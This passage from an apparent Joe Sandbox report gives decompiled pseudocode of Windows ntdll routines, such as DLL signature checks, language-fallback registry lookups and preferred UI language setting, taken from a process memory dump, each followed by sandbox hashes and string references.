              							E04C45510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
              							_t102 =  *0x4cb5780; // 0x0
              						}
              						if((_t102 & 0x00000010) != 0) {
              							asm("int3");
              						}
              						_t124 = 0xc0000428;
              						goto L8;
              					}
              					L5:
              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
              						goto L8;
              					}
              					_t77 = _a4 - 0x40000003;
              					if(_t77 == 0 || _t77 == 0x33) {
              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
              						if(E04BE7D50() != 0) {
              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              						} else {
              							_t82 = 0x7ffe0384;
              						}
              						_t108 = 0x7ffe0385;
              						if( *_t82 != 0) {
              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
              								if(E04BE7D50() == 0) {
              									_t97 = 0x7ffe0385;
              								} else {
              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
              								}
              								if(( *_t97 & 0x00000020) != 0) {
              									E04C47016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
              								}
              							}
              						}
              						if(_a4 != 0x40000003) {
              							L14:
              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
              							if(E04BE7D50() != 0) {
              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              							} else {
              								_t87 = 0x7ffe0384;
              							}
              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
              								if(E04BE7D50() != 0) {
              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
              								}
              								if(( *_t108 & 0x00000020) != 0) {
              									E04C47016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
              								}
              							}
              							goto L8;
              						} else {
              							_v16 = _t125 + 0x24;
              							_t124 = E04BFA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
              							if(_t124 < 0) {
              								E04BCB1E1(_t124, 0x1490, 0, _v16);
              								goto L8;
              							}
              							goto L14;
              						}
              					} else {
              						goto L8;
              					}
              				}
              			}

              Strings
              • LdrpCompleteMapModule, xrefs: 04C29898
              • Could not validate the crypto signature for DLL %wZ, xrefs: 04C29891
              • minkernel\ntdll\ldrmap.c, xrefs: 04C298A2
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
              • API String ID: 0-1676968949
              • Opcode ID: 83f4404c43026b231cc18bac563880571b03702cae3d40ca065de47aa03ebdba
              • Instruction ID: a0b580067f6c78be148241ff5cb472a326b88743ee3f42ca4cf7cc92bc0648a2
              • Opcode Fuzzy Hash: 83f4404c43026b231cc18bac563880571b03702cae3d40ca065de47aa03ebdba
              • Instruction Fuzzy Hash: CF5113717007559BEB25CF68CA44BAAB7E9EB40314F040AD9E8559B7E1EB70FD00CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E04BCE620(void* __ecx, short* __edx, short* _a4) {
              				char _v16;
              				char _v20;
              				intOrPtr _v24;
              				char* _v28;
              				char _v32;
              				char _v36;
              				char _v44;
              				signed int _v48;
              				intOrPtr _v52;
              				void* _v56;
              				void* _v60;
              				char _v64;
              				void* _v68;
              				void* _v76;
              				void* _v84;
              				signed int _t59;
              				signed int _t74;
              				signed short* _t75;
              				signed int _t76;
              				signed short* _t78;
              				signed int _t83;
              				short* _t93;
              				signed short* _t94;
              				short* _t96;
              				void* _t97;
              				signed int _t99;
              				void* _t101;
              				void* _t102;
              
              				_t80 = __ecx;
              				_t101 = (_t99 & 0xfffffff8) - 0x34;
              				_t96 = __edx;
              				_v44 = __edx;
              				_t78 = 0;
              				_v56 = 0;
              				if(__ecx == 0 || __edx == 0) {
              					L28:
              					_t97 = 0xc000000d;
              				} else {
              					_t93 = _a4;
              					if(_t93 == 0) {
              						goto L28;
              					}
              					_t78 = E04BCF358(__ecx, 0xac);
              					if(_t78 == 0) {
              						_t97 = 0xc0000017;
              						L6:
              						if(_v56 != 0) {
              							_push(_v56);
              							E04C095D0();
              						}
              						if(_t78 != 0) {
              							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
              						}
              						return _t97;
              					}
              					E04C0FA60(_t78, 0, 0x158);
              					_v48 = _v48 & 0x00000000;
              					_t102 = _t101 + 0xc;
              					 *_t96 = 0;
              					 *_t93 = 0;
              					E04C0BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
              					_v36 = 0x18;
              					_v28 =  &_v44;
              					_v64 = 0;
              					_push( &_v36);
              					_push(0x20019);
              					_v32 = 0;
              					_push( &_v64);
              					_v24 = 0x40;
              					_v20 = 0;
              					_v16 = 0;
              					_t97 = E04C09600();
              					if(_t97 < 0) {
              						goto L6;
              					}
              					E04C0BB40(0,  &_v36, L"InstallLanguageFallback");
              					_push(0);
              					_v48 = 4;
              					_t97 = L04BCF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
              					if(_t97 >= 0) {
              						if(_v52 != 1) {
              							L17:
              							_t97 = 0xc0000001;
              							goto L6;
              						}
              						_t59 =  *_t78 & 0x0000ffff;
              						_t94 = _t78;
              						_t83 = _t59;
              						if(_t59 == 0) {
              							L19:
              							if(_t83 == 0) {
              								L23:
              								E04C0BB40(_t83, _t102 + 0x24, _t78);
              								if(L04BD43C0( &_v48,  &_v64) == 0) {
              									goto L17;
              								}
              								_t84 = _v48;
              								 *_v48 = _v56;
              								if( *_t94 != 0) {
              									E04C0BB40(_t84, _t102 + 0x24, _t94);
              									if(L04BD43C0( &_v48,  &_v64) != 0) {
              										 *_a4 = _v56;
              									} else {
              										_t97 = 0xc0000001;
              										 *_v48 = 0;
              									}
              								}
              								goto L6;
              							}
              							_t83 = _t83 & 0x0000ffff;
              							while(_t83 == 0x20) {
              								_t94 =  &(_t94[1]);
              								_t74 =  *_t94 & 0x0000ffff;
              								_t83 = _t74;
              								if(_t74 != 0) {
              									continue;
              								}
              								goto L23;
              							}
              							goto L23;
              						} else {
              							goto L14;
              						}
              						while(1) {
              							L14:
              							_t27 =  &(_t94[1]); // 0x2
              							_t75 = _t27;
              							if(_t83 == 0x2c) {
              								break;
              							}
              							_t94 = _t75;
              							_t76 =  *_t94 & 0x0000ffff;
              							_t83 = _t76;
              							if(_t76 != 0) {
              								continue;
              							}
              							goto L23;
              						}
              						 *_t94 = 0;
              						_t94 = _t75;
              						_t83 =  *_t75 & 0x0000ffff;
              						goto L19;
              					}
              				}
              			}

              Strings
              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04BCE68C
              • InstallLanguageFallback, xrefs: 04BCE6DB
              • @, xrefs: 04BCE6C0
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
              • API String ID: 0-1757540487
              • Opcode ID: 7eea894bfd9b3c095852ec6b361f9a8d70d07ce89d2958fe54038d9793a65c80
              • Instruction ID: 471873c49823c00f0bc6a8124ff93de754e76da2d114d5fa5fc402945bf22529
              • Opcode Fuzzy Hash: 7eea894bfd9b3c095852ec6b361f9a8d70d07ce89d2958fe54038d9793a65c80
              • Instruction Fuzzy Hash: 9751B2B6508365ABD714DF64C480A6BB3E9BF88714F05096EF989D7240FB74FA04C7A2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E04BCB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
              				signed int _t65;
              				signed short _t69;
              				intOrPtr _t70;
              				signed short _t85;
              				void* _t86;
              				signed short _t89;
              				signed short _t91;
              				intOrPtr _t92;
              				intOrPtr _t97;
              				intOrPtr* _t98;
              				signed short _t99;
              				signed short _t101;
              				void* _t102;
              				char* _t103;
              				signed short _t104;
              				intOrPtr* _t110;
              				void* _t111;
              				void* _t114;
              				intOrPtr* _t115;
              
              				_t109 = __esi;
              				_t108 = __edi;
              				_t106 = __edx;
              				_t95 = __ebx;
              				_push(0x90);
              				_push(0x4c9f7a8);
              				E04C1D0E8(__ebx, __edi, __esi);
              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
              				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
              				if(__edx == 0xffffffff) {
              					L6:
              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
              					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
              					__eflags = _t65 & 0x00000002;
              					if((_t65 & 0x00000002) != 0) {
              						L3:
              						L4:
              						return E04C1D130(_t95, _t108, _t109);
              					}
              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
              					_t108 = 0;
              					_t109 = 0;
              					_t95 = 0;
              					__eflags = 0;
              					while(1) {
              						__eflags = _t95 - 0x200;
              						if(_t95 >= 0x200) {
              							break;
              						}
              						E04C0D000(0x80);
              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
              						_t108 = _t115;
              						_t95 = _t95 - 0xffffff80;
              						_t17 = _t114 - 4;
              						 *_t17 =  *(_t114 - 4) & 0x00000000;
              						__eflags =  *_t17;
              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
              						_t102 = _t110 + 1;
              						do {
              							_t85 =  *_t110;
              							_t110 = _t110 + 1;
              							__eflags = _t85;
              						} while (_t85 != 0);
              						_t111 = _t110 - _t102;
              						_t21 = _t95 - 1; // -129
              						_t86 = _t21;
              						__eflags = _t111 - _t86;
              						if(_t111 > _t86) {
              							_t111 = _t86;
              						}
              						E04C0F3E0(_t108, _t106, _t111);
              						_t115 = _t115 + 0xc;
              						_t103 = _t111 + _t108;
              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
              						_t89 = _t95 - _t111;
              						__eflags = _t89;
              						_push(0);
              						if(_t89 == 0) {
              							L15:
              							_t109 = 0xc000000d;
              							goto L16;
              						} else {
              							__eflags = _t89 - 0x7fffffff;
              							if(_t89 <= 0x7fffffff) {
              								L16:
              								 *(_t114 - 0x94) = _t109;
              								__eflags = _t109;
              								if(_t109 < 0) {
              									__eflags = _t89;
              									if(_t89 != 0) {
              										 *_t103 = 0;
              									}
              									L26:
              									 *(_t114 - 0xa0) = _t109;
              									 *(_t114 - 4) = 0xfffffffe;
              									__eflags = _t109;
              									if(_t109 >= 0) {
              										L31:
              										_t98 = _t108;
              										_t39 = _t98 + 1; // 0x1
              										_t106 = _t39;
              										do {
              											_t69 =  *_t98;
              											_t98 = _t98 + 1;
              											__eflags = _t69;
              										} while (_t69 != 0);
              										_t99 = _t98 - _t106;
              										__eflags = _t99;
              										L34:
              										_t70 =  *[fs:0x30];
              										__eflags =  *((char*)(_t70 + 2));
              										if( *((char*)(_t70 + 2)) != 0) {
              											L40:
              											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
              											 *(_t114 - 4) = 1;
              											_push(_t114 - 0x74);
              											L04C1DEF0(_t99, _t106);
              											 *(_t114 - 4) = 0xfffffffe;
              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
              											goto L3;
              										}
              										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
              											goto L40;
              										}
              										_push( *((intOrPtr*)(_t114 + 8)));
              										_push( *((intOrPtr*)(_t114 - 0x9c)));
              										_push(_t99 & 0x0000ffff);
              										_push(_t108);
              										_push(1);
              										_t101 = E04C0B280();
              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
              										if( *((char*)(_t114 + 0x14)) == 1) {
              											__eflags = _t101 - 0x80000003;
              											if(_t101 == 0x80000003) {
              												E04C0B7E0(1);
              												_t101 = 0;
              												__eflags = 0;
              											}
              										}
              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
              										goto L4;
              									}
              									__eflags = _t109 - 0x80000005;
              									if(_t109 == 0x80000005) {
              										continue;
              									}
              									break;
              								}
              								 *(_t114 - 0x90) = 0;
              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
              								_t91 = E04C0E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
              								_t115 = _t115 + 0x10;
              								_t104 = _t91;
              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
              								__eflags = _t104;
              								if(_t104 < 0) {
              									L21:
              									_t109 = 0x80000005;
              									 *(_t114 - 0x90) = 0x80000005;
              									L22:
              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
              									L23:
              									 *(_t114 - 0x94) = _t109;
              									goto L26;
              								}
              								__eflags = _t104 - _t92;
              								if(__eflags > 0) {
              									goto L21;
              								}
              								if(__eflags == 0) {
              									goto L22;
              								}
              								goto L23;
              							}
              							goto L15;
              						}
              					}
              					__eflags = _t109;
              					if(_t109 >= 0) {
              						goto L31;
              					}
              					__eflags = _t109 - 0x80000005;
              					if(_t109 != 0x80000005) {
              						goto L31;
              					}
              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
              					_t38 = _t95 - 1; // -129
              					_t99 = _t38;
              					goto L34;
              				}
              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
              					__eflags = __edx - 0x65;
              					if(__edx != 0x65) {
              						goto L2;
              					}
              					goto L6;
              				}
              				L2:
              				_push( *((intOrPtr*)(_t114 + 8)));
              				_push(_t106);
              				if(E04C0A890() != 0) {
              					goto L6;
              				}
              				goto L3;
              			}

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: _vswprintf_s
              • String ID:
              • API String ID: 677850445-0
              • Opcode ID: 5d255f35718bcc6f373c85e4b76b260733f4f92fcbc08be791717711c6d76432
              • Instruction ID: 8deade16c1ca03dd0206858c719ac750597c1dec27a2f587791c555589299d0d
              • Opcode Fuzzy Hash: 5d255f35718bcc6f373c85e4b76b260733f4f92fcbc08be791717711c6d76432
              • Instruction Fuzzy Hash: 0051F371D102798FEB39DF64C944BBEBBB2AF00714F1041ADD8599B281D7B06A419B94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E04BEB944(signed int* __ecx, char __edx) {
              				signed int _v8;
              				signed int _v16;
              				signed int _v20;
              				char _v28;
              				signed int _v32;
              				char _v36;
              				signed int _v40;
              				intOrPtr _v44;
              				signed int* _v48;
              				signed int _v52;
              				signed int _v56;
              				intOrPtr _v60;
              				intOrPtr _v64;
              				intOrPtr _v68;
              				intOrPtr _v72;
              				intOrPtr _v76;
              				char _v77;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t65;
              				intOrPtr _t67;
              				intOrPtr _t68;
              				char* _t73;
              				intOrPtr _t77;
              				intOrPtr _t78;
              				signed int _t82;
              				intOrPtr _t83;
              				void* _t87;
              				char _t88;
              				intOrPtr* _t89;
              				intOrPtr _t91;
              				void* _t97;
              				intOrPtr _t100;
              				void* _t102;
              				void* _t107;
              				signed int _t108;
              				intOrPtr* _t112;
              				void* _t113;
              				intOrPtr* _t114;
              				intOrPtr _t115;
              				intOrPtr _t116;
              				intOrPtr _t117;
              				signed int _t118;
              				void* _t130;
              
              				_t120 = (_t118 & 0xfffffff8) - 0x4c;
              				_v8 =  *0x4cbd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
              				_t112 = __ecx;
              				_v77 = __edx;
              				_v48 = __ecx;
              				_v28 = 0;
              				_t5 = _t112 + 0xc; // 0x575651ff
              				_t105 =  *_t5;
              				_v20 = 0;
              				_v16 = 0;
              				if(_t105 == 0) {
              					_t50 = _t112 + 4; // 0x5de58b5b
              					_t60 =  *__ecx |  *_t50;
              					if(( *__ecx |  *_t50) != 0) {
              						 *__ecx = 0;
              						__ecx[1] = 0;
              						if(E04BE7D50() != 0) {
              							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              						} else {
              							_t65 = 0x7ffe0386;
              						}
              						if( *_t65 != 0) {
              							E04C98CD6(_t112);
              						}
              						_push(0);
              						_t52 = _t112 + 0x10; // 0x778df98b
              						_push( *_t52);
              						_t60 = E04C09E20();
              					}
              					L20:
              					_pop(_t107);
              					_pop(_t113);
              					_pop(_t87);
              					return E04C0B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
              				}
              				_t8 = _t112 + 8; // 0x8b000cc2
              				_t67 =  *_t8;
              				_t88 =  *((intOrPtr*)(_t67 + 0x10));
              				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
              				_t108 =  *(_t67 + 0x14);
              				_t68 =  *((intOrPtr*)(_t105 + 0x14));
              				_t105 = 0x2710;
              				asm("sbb eax, edi");
              				_v44 = _t88;
              				_v52 = _t108;
              				_t60 = E04C0CE00(_t97, _t68, 0x2710, 0);
              				_v56 = _t60;
              				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
              					L3:
              					 *(_t112 + 0x44) = _t60;
              					_t105 = _t60 * 0x2710 >> 0x20;
              					 *_t112 = _t88;
              					 *(_t112 + 4) = _t108;
              					_v20 = _t60 * 0x2710;
              					_v16 = _t60 * 0x2710 >> 0x20;
              					if(_v77 != 0) {
              						L16:
              						_v36 = _t88;
              						_v32 = _t108;
              						if(E04BE7D50() != 0) {
              							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              						} else {
              							_t73 = 0x7ffe0386;
              						}
              						if( *_t73 != 0) {
              							_t105 = _v40;
              							E04C98F6A(_t112, _v40, _t88, _t108);
              						}
              						_push( &_v28);
              						_push(0);
              						_push( &_v36);
              						_t48 = _t112 + 0x10; // 0x778df98b
              						_push( *_t48);
              						_t60 = E04C0AF60();
              						goto L20;
              					} else {
              						_t89 = 0x7ffe03b0;
              						do {
              							_t114 = 0x7ffe0010;
              							do {
              								_t77 =  *0x4cb8628; // 0x0
              								_v68 = _t77;
              								_t78 =  *0x4cb862c; // 0x0
              								_v64 = _t78;
              								_v72 =  *_t89;
              								_v76 =  *((intOrPtr*)(_t89 + 4));
              								while(1) {
              									_t105 =  *0x7ffe000c;
              									_t100 =  *0x7ffe0008;
              									if(_t105 ==  *_t114) {
              										goto L8;
              									}
              									asm("pause");
              								}
              								L8:
              								_t89 = 0x7ffe03b0;
              								_t115 =  *0x7ffe03b0;
              								_t82 =  *0x7FFE03B4;
              								_v60 = _t115;
              								_t114 = 0x7ffe0010;
              								_v56 = _t82;
              							} while (_v72 != _t115 || _v76 != _t82);
              							_t83 =  *0x4cb8628; // 0x0
              							_t116 =  *0x4cb862c; // 0x0
              							_v76 = _t116;
              							_t117 = _v68;
              						} while (_t117 != _t83 || _v64 != _v76);
              						asm("sbb edx, [esp+0x24]");
              						_t102 = _t100 - _v60 - _t117;
              						_t112 = _v48;
              						_t91 = _v44;
              						asm("sbb edx, eax");
              						_t130 = _t105 - _v52;
              						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
              							_t88 = _t102 - _t91;
              							asm("sbb edx, edi");
              							_t108 = _t105;
              						} else {
              							_t88 = 0;
              							_t108 = 0;
              						}
              						goto L16;
              					}
              				} else {
              					if( *(_t112 + 0x44) == _t60) {
              						goto L20;
              					}
              					goto L3;
              				}
              			}

              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BEB9A5
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID:
              • API String ID: 885266447-0
              • Opcode ID: dca0dea249227b8afcb2ad07960c65fdb9c49a6de1acd5ad1fffe117220dc662
              • Instruction ID: 7b5f471a7d1823d45ab0d2062405acd1bcbbb64f0a18b39f9e8a8509126b7fec
              • Opcode Fuzzy Hash: dca0dea249227b8afcb2ad07960c65fdb9c49a6de1acd5ad1fffe117220dc662
              • Instruction Fuzzy Hash: 09514971608340CFCB20DF2AC080A2ABBE5FBC8614F1489AEE59597355EB30F945DB92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E04BFFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
              				char _v5;
              				signed int _v8;
              				signed int _v12;
              				char _v16;
              				char _v17;
              				char _v20;
              				signed int _v24;
              				char _v28;
              				char _v32;
              				signed int _v40;
              				void* __ecx;
              				void* __edi;
              				void* __ebp;
              				signed int _t73;
              				intOrPtr* _t75;
              				signed int _t77;
              				signed int _t79;
              				signed int _t81;
              				intOrPtr _t83;
              				intOrPtr _t85;
              				intOrPtr _t86;
              				signed int _t91;
              				signed int _t94;
              				signed int _t95;
              				signed int _t96;
              				signed int _t106;
              				signed int _t108;
              				signed int _t114;
              				signed int _t116;
              				signed int _t118;
              				signed int _t122;
              				signed int _t123;
              				void* _t129;
              				signed int _t130;
              				void* _t132;
              				intOrPtr* _t134;
              				signed int _t138;
              				signed int _t141;
              				signed int _t147;
              				intOrPtr _t153;
              				signed int _t154;
              				signed int _t155;
              				signed int _t170;
              				void* _t174;
              				signed int _t176;
              				signed int _t177;
              
              				_t129 = __ebx;
              				_push(_t132);
              				_push(__esi);
              				_t174 = _t132;
              				_t73 =  !( *( *(_t174 + 0x18)));
              				if(_t73 >= 0) {
              					L5:
              					return _t73;
              				} else {
              					E04BDEEF0(0x4cb7b60);
              					_t134 =  *0x4cb7b84; // 0x77497b80
              					_t2 = _t174 + 0x24; // 0x24
              					_t75 = _t2;
              					if( *_t134 != 0x4cb7b80) {
              						_push(3);
              						asm("int 0x29");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						_push(0x4cb7b60);
              						_t170 = _v8;
              						_v28 = 0;
              						_v40 = 0;
              						_v24 = 0;
              						_v17 = 0;
              						_v32 = 0;
              						__eflags = _t170 & 0xffff7cf2;
              						if((_t170 & 0xffff7cf2) != 0) {
              							L43:
              							_t77 = 0xc000000d;
              						} else {
              							_t79 = _t170 & 0x0000000c;
              							__eflags = _t79;
              							if(_t79 != 0) {
              								__eflags = _t79 - 0xc;
              								if(_t79 == 0xc) {
              									goto L43;
              								} else {
              									goto L9;
              								}
              							} else {
              								_t170 = _t170 | 0x00000008;
              								__eflags = _t170;
              								L9:
              								_t81 = _t170 & 0x00000300;
              								__eflags = _t81 - 0x300;
              								if(_t81 == 0x300) {
              									goto L43;
              								} else {
              									_t138 = _t170 & 0x00000001;
              									__eflags = _t138;
              									_v24 = _t138;
              									if(_t138 != 0) {
              										__eflags = _t81;
              										if(_t81 != 0) {
              											goto L43;
              										} else {
              											goto L11;
              										}
              									} else {
              										L11:
              										_push(_t129);
              										_t77 = E04BD6D90( &_v20);
              										_t130 = _t77;
              										__eflags = _t130;
              										if(_t130 >= 0) {
              											_push(_t174);
              											__eflags = _t170 & 0x00000301;
              											if((_t170 & 0x00000301) == 0) {
              												_t176 = _a8;
              												__eflags = _t176;
              												if(__eflags == 0) {
              													L64:
              													_t83 =  *[fs:0x18];
              													_t177 = 0;
              													__eflags =  *(_t83 + 0xfb8);
              													if( *(_t83 + 0xfb8) != 0) {
              														E04BD76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
              														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
              													}
              													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
              													goto L15;
              												} else {
              													asm("sbb edx, edx");
              													_t114 = E04C68938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
              													__eflags = _t114;
              													if(_t114 < 0) {
              														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
              														E04BCB150();
              													}
              													_t116 = E04C66D81(_t176,  &_v16);
              													__eflags = _t116;
              													if(_t116 >= 0) {
              														__eflags = _v16 - 2;
              														if(_v16 < 2) {
              															L56:
              															_t118 = E04BD75CE(_v20, 5, 0);
              															__eflags = _t118;
              															if(_t118 < 0) {
              																L67:
              																_t130 = 0xc0000017;
              																goto L32;
              															} else {
              																__eflags = _v12;
              																if(_v12 == 0) {
              																	goto L67;
              																} else {
              																	_t153 =  *0x4cb8638; // 0x310f1b0
              																	_t122 = L04BD38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
              																	_t154 = _v12;
              																	_t130 = _t122;
              																	__eflags = _t130;
              																	if(_t130 >= 0) {
              																		_t123 =  *(_t154 + 4) & 0x0000ffff;
              																		__eflags = _t123;
              																		if(_t123 != 0) {
              																			_t155 = _a12;
              																			__eflags = _t155;
              																			if(_t155 != 0) {
              																				 *_t155 = _t123;
              																			}
              																			goto L64;
              																		} else {
              																			E04BD76E2(_t154);
              																			goto L41;
              																		}
              																	} else {
              																		E04BD76E2(_t154);
              																		_t177 = 0;
              																		goto L18;
              																	}
              																}
              															}
              														} else {
              															__eflags =  *_t176;
              															if( *_t176 != 0) {
              																goto L56;
              															} else {
              																__eflags =  *(_t176 + 2);
              																if( *(_t176 + 2) == 0) {
              																	goto L64;
              																} else {
              																	goto L56;
              																}
              															}
              														}
              													} else {
              														_t130 = 0xc000000d;
              														goto L32;
              													}
              												}
              												goto L35;
              											} else {
              												__eflags = _a8;
              												if(_a8 != 0) {
              													_t77 = 0xc000000d;
              												} else {
              													_v5 = 1;
              													L04BFFCE3(_v20, _t170);
              													_t177 = 0;
              													__eflags = 0;
              													L15:
              													_t85 =  *[fs:0x18];
              													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
              													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
              														L18:
              														__eflags = _t130;
              														if(_t130 != 0) {
              															goto L32;
              														} else {
              															__eflags = _v5 - _t130;
              															if(_v5 == _t130) {
              																goto L32;
              															} else {
              																_t86 =  *[fs:0x18];
              																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
              																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
              																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
              																}
              																__eflags = _t177;
              																if(_t177 == 0) {
              																	L31:
              																	__eflags = 0;
              																	L04BD70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
              																	goto L32;
              																} else {
              																	__eflags = _v24;
              																	_t91 =  *(_t177 + 0x20);
              																	if(_v24 != 0) {
              																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
              																		goto L31;
              																	} else {
              																		_t141 = _t91 & 0x00000040;
              																		__eflags = _t170 & 0x00000100;
              																		if((_t170 & 0x00000100) == 0) {
              																			__eflags = _t141;
              																			if(_t141 == 0) {
              																				L74:
              																				_t94 = _t91 & 0xfffffffd | 0x00000004;
              																				goto L27;
              																			} else {
              																				_t177 = E04BFFD22(_t177);
              																				__eflags = _t177;
